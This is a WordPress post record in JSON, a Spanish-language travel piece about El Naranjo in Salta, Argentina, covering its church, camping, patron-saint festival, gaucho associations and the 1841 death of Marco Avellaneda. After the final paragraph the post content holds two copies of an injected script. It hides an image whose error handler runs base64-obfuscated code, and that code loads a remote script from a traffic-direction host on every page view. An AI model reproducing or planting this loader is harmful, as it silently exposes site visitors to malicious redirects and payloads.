{"id":4010,"date":"2024-05-16T13:23:30","date_gmt":"2024-05-16T16:23:30","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4010"},"modified":"2025-08-13T23:55:53","modified_gmt":"2025-08-14T02:55:53","slug":"el-naranjo-historia-y-tradicion-en-la-provincia-de-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4010","title":{"rendered":"\u00abEl Naranjo: Historia y Tradici\u00f3n en la Provincia de Salta\u00bb"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-8164fb267dc1c5ca57f0fa49f5c39d7b\" style=\"background-color:#850438\"><em>El Naranjo es una peque\u00f1a localidad ubicada en el sur de la provincia de Salta, en Argentina. Es un destino tur\u00edstico popular debido a su rica cultura y hermosos paisajes naturales.<\/em><\/h3>\n\n\n\n<p>En cuanto a su aspecto cultural, El Naranjo cuenta con una iglesia colonial de estilo barroco, que es uno de los principales atractivos arquitect\u00f3nicos de la localidad. Adem\u00e1s, se pueden visitar el museo donde se muestra la historia y la cultura de la regi\u00f3n.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"4027\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_132919-1-1024x768.jpg\" alt=\"\" class=\"wp-image-4027\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_132919-1-1024x768.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_132919-1-300x225.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_132919-1-768x576.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_132919-1-1536x1152.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_132919-1-2048x1536.jpg 2048w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_132919-1-560x420.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_132919-1-80x60.jpg 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_132919-1-696x522.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_132919-1-1068x801.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_132919-1-1920x1440.jpg 1920w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_132919-1-265x198.jpg 265w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"849\" data-id=\"4028\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_133035-1-1024x849.jpg\" alt=\"\" class=\"wp-image-4028\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_133035-1-1024x849.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_133035-1-300x249.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_133035-1-768x637.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_133035-1-1536x1274.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_133035-1-2048x1698.jpg 2048w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_133035-1-507x420.jpg 507w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_133035-1-696x577.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_133035-1-1068x886.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_133035-1-1920x1592.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>En cuanto a sus atractivos tur\u00edsticos, El Naranjo ofrece la posibilidad de realizar actividades al aire libre, como senderismo, trekking y paseos a caballo, para disfrutar de la belleza de sus paisajes monta\u00f1osos y sus r\u00edos cristalinos. Tambi\u00e9n se pueden realizar excursiones a las serran\u00edas con yungas, un impresionante bosque que es uno de los paisajes m\u00e1s emblem\u00e1ticos de la regi\u00f3n, en el lugar se encuentra el <strong><em>campin Euli<\/em><\/strong> , que cuenta con buena estructura y servicios para todo aquel que quiera pasar unos d\u00edas de pura naturaleza y tranquilidad. <\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-2 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"4020\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/EFFECTS-1024x768.jpg\" alt=\"\" class=\"wp-image-4020\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/EFFECTS-1024x768.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/EFFECTS-300x225.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/EFFECTS-768x576.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/EFFECTS-1536x1152.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/EFFECTS-2048x1536.jpg 2048w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/EFFECTS-560x420.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/EFFECTS-80x60.jpg 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/EFFECTS-696x522.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/EFFECTS-1068x801.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/EFFECTS-1920x1440.jpg 1920w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/EFFECTS-265x198.jpg 265w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Plaza principal<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"4024\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20221121_200021_2-1024x576.jpg\" alt=\"\" class=\"wp-image-4024\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20221121_200021_2-1024x576.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20221121_200021_2-300x169.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20221121_200021_2-768x432.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20221121_200021_2-1536x864.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20221121_200021_2-2048x1153.jpg 2048w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20221121_200021_2-746x420.jpg 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20221121_200021_2-696x392.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20221121_200021_2-1068x601.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20221121_200021_2-1920x1080.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Ingreso desde la Ruta 9\/34<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"800\" height=\"550\" data-id=\"4026\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/multimedia.normal.958a0331b6644736.63616d70696e672d65756c692d656c2d6e6172616e6a6f5f6e6f726d616c2e6a7067.jpg\" alt=\"\" class=\"wp-image-4026\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/multimedia.normal.958a0331b6644736.63616d70696e672d65756c692d656c2d6e6172616e6a6f5f6e6f726d616c2e6a7067.jpg 800w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/multimedia.normal.958a0331b6644736.63616d70696e672d65756c692d656c2d6e6172616e6a6f5f6e6f726d616c2e6a7067-300x206.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/multimedia.normal.958a0331b6644736.63616d70696e672d65756c692d656c2d6e6172616e6a6f5f6e6f726d616c2e6a7067-768x528.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/multimedia.normal.958a0331b6644736.63616d70696e672d65756c692d656c2d6e6172616e6a6f5f6e6f726d616c2e6a7067-611x420.jpg 611w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/multimedia.normal.958a0331b6644736.63616d70696e672d65756c692d656c2d6e6172616e6a6f5f6e6f726d616c2e6a7067-218x150.jpg 218w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/multimedia.normal.958a0331b6644736.63616d70696e672d65756c692d656c2d6e6172616e6a6f5f6e6f726d616c2e6a7067-696x479.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/multimedia.normal.958a0331b6644736.63616d70696e672d65756c692d656c2d6e6172616e6a6f5f6e6f726d616c2e6a7067-100x70.jpg 100w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><figcaption class=\"wp-element-caption\">Camping Euli<\/figcaption><\/figure>\n<\/figure>\n\n\n\n<p>El 24 de septiembre en El Naranjo, ubicado en el sur de Salta, se celebra el D\u00eda de la Virgen de la Merced, que es la patrona del pueblo. Esta festividad es una ocasi\u00f3n importante para la comunidad local y suele incluir procesiones, misas, ferias y otras actividades culturales.<\/p>\n\n\n\n<p>El Naranjo se encuentra en el departamento de Rosario de la Frontera, al sur de la provincia de Salta y limita con las provincias de Tucum\u00e1n y Santiago del Estero<\/p>\n\n\n\n<h3 class=\"wp-block-heading has-text-color has-link-color wp-elements-4ca1e2bd6fb5ef6b19115cbb2502d68e\" style=\"color:#750320\">Fort\u00edn Gauchos Gral. Martin M. de G\u00fcemes<\/h3>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_132330-1-1024x768.jpg\" alt=\"\" class=\"wp-image-4012\" style=\"width:298px;height:auto\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_132330-1-1024x768.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_132330-1-300x225.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_132330-1-768x576.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_132330-1-1536x1152.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_132330-1-2048x1536.jpg 2048w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_132330-1-560x420.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_132330-1-80x60.jpg 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_132330-1-696x522.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_132330-1-1068x801.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_132330-1-1920x1440.jpg 1920w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG_20200308_132330-1-265x198.jpg 265w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div>\n\n\n<p>El primero y el m\u00e1s antiguo es el fort\u00edn El Naranjo, con su agrupaci\u00f3n, gauchos Gral. Martin Miguel de G\u00fcemes, fundado el 23 de agosto de 1973, este fort\u00edn tiene su sede en el mism\u00edsimo pueblo, el cual, es visitado oportunamente por los turistas que se llegan hasta all\u00ed, para dar asombro en los elementos hist\u00f3ricos que guardan en su museo.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<h3 class=\"wp-block-heading has-text-color has-link-color wp-elements-c72ca9f71525e18c29339ee15c01a54c\" style=\"color:#810a28\">Fort\u00edn Agrupaci\u00f3n 24 de Septiembre<\/h3>\n\n\n\n<p>Fort\u00edn 24 de septiembre, es el nombre del segundo agrupamiento de hombres y mujeres que resguardan las culturas y tradiciones gauchescas en el sur provincial, este fort\u00edn da sus inicios all\u00e1 por el a\u00f1o 1992 obteniendo su personer\u00eda jur\u00eddica reci\u00e9n el 24 de abril del a\u00f1o 2015, el mismos tiene su sede en el paraje Pozo Verde, &#8211;<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-3 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"4014\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0047-1024x576.jpg\" alt=\"\" class=\"wp-image-4014\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0047-1024x576.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0047-300x169.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0047-768x432.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0047-747x420.jpg 747w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0047-696x392.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0047-1068x601.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0047.jpg 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Integrantes fundadores de la Agrupaci\u00f3n Fort\u00edn 24 septiembre<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"4022\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0062-1024x768.jpg\" alt=\"\" class=\"wp-image-4022\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0062-1024x768.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0062-300x225.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0062-768x576.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0062-1536x1152.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0062-560x420.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0062-80x60.jpg 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0062-696x522.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0062-1068x801.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0062-265x198.jpg 265w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0062.jpg 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Comisi\u00f3n directiva &#8211; Agrupaci\u00f3n Fort\u00edn 24 septiembre<\/figcaption><\/figure>\n<\/figure>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-4 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1440\" height=\"2560\" data-id=\"4017\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/DSC_0226-edited-scaled.jpg\" alt=\"\" class=\"wp-image-4017\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/DSC_0226-edited-scaled.jpg 1440w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/DSC_0226-edited-169x300.jpg 169w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/DSC_0226-edited-576x1024.jpg 576w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/DSC_0226-edited-768x1365.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/DSC_0226-edited-864x1536.jpg 864w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/DSC_0226-edited-1152x2048.jpg 1152w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/DSC_0226-edited-236x420.jpg 236w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/DSC_0226-edited-696x1237.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/DSC_0226-edited-1068x1899.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/DSC_0226-edited-1920x3413.jpg 1920w\" sizes=\"(max-width: 1440px) 100vw, 1440px\" \/><figcaption class=\"wp-element-caption\">Rolando Romano, Presidente, Fort\u00edn 24 Septiembre<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" data-id=\"4018\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0058-576x1024.jpg\" alt=\"\" class=\"wp-image-4018\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0058-576x1024.jpg 576w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0058-169x300.jpg 169w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0058-236x420.jpg 236w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0058-696x1237.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0058.jpg 720w\" sizes=\"(max-width: 576px) 100vw, 576px\" \/><figcaption class=\"wp-element-caption\">Gaucho &#8211; Fortin 24 Septiembre<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" data-id=\"4019\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0057-576x1024.jpg\" alt=\"\" class=\"wp-image-4019\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0057-576x1024.jpg 576w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0057-169x300.jpg 169w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0057-236x420.jpg 236w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0057-696x1237.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/IMG-20240516-WA0057.jpg 720w\" sizes=\"(max-width: 576px) 100vw, 576px\" \/><figcaption class=\"wp-element-caption\">Dama &#8211; Fortin 24 Septiembre<\/figcaption><\/figure>\n<\/figure>\n\n\n\n<h3 class=\"wp-block-heading has-text-color has-link-color wp-elements-a8bcbeac4bf486e0e26e4a0d9ecb6c91\" style=\"color:#64051d\"><em>Historia<\/em><\/h3>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"405\" height=\"487\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/marco_avellaneda.jpg\" alt=\"\" class=\"wp-image-4013\" style=\"width:134px;height:auto\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/marco_avellaneda.jpg 405w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/marco_avellaneda-249x300.jpg 249w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/05\/marco_avellaneda-349x420.jpg 349w\" sizes=\"(max-width: 405px) 100vw, 405px\" \/><\/figure><\/div>\n\n\n<p>Pozo verde, lugar <strong><em>historico<\/em><\/strong> donde el 3 de octubre de <em>1841<\/em> es capturado y decapitado, Marco Avellaneda, Periodista, abogado y pol\u00edtico argentino. Nacido en Catamarca, que luego se traslad\u00f3 a Buenos Aires, donde se doctor\u00f3 en Derecho. Hijo de Nicol\u00e1s Avellaneda y Tula (primer gobernador de Catamarca) y padre del Presidente Nicol\u00e1s Avellaneda.&nbsp; perseguido por su actividad period\u00edstica contraria a Juan Manuel de Rosas, el que lo captura y da muerte es el general rosista&nbsp;<strong>Manuel Oribe<\/strong>. , aquel que comandaba la coalici\u00f3n de fuerzas.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Naranjo es una peque\u00f1a localidad ubicada en el sur de la provincia de Salta, en Argentina. Es un destino tur\u00edstico popular debido a su rica cultura y hermosos paisajes naturales. En cuanto a su aspecto cultural, El Naranjo cuenta con una iglesia colonial de estilo barroco, que es uno de los principales atractivos arquitect\u00f3nicos [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4029,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15,18],"tags":[],"class_list":{"0":"post-4010","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4010"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4010"}],"version-history":[{"count":7,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4010\/revisions"}],"predecessor-version":[{"id":6785,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4010\/revisions\/6785"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4029"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4010"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4010"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4010"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}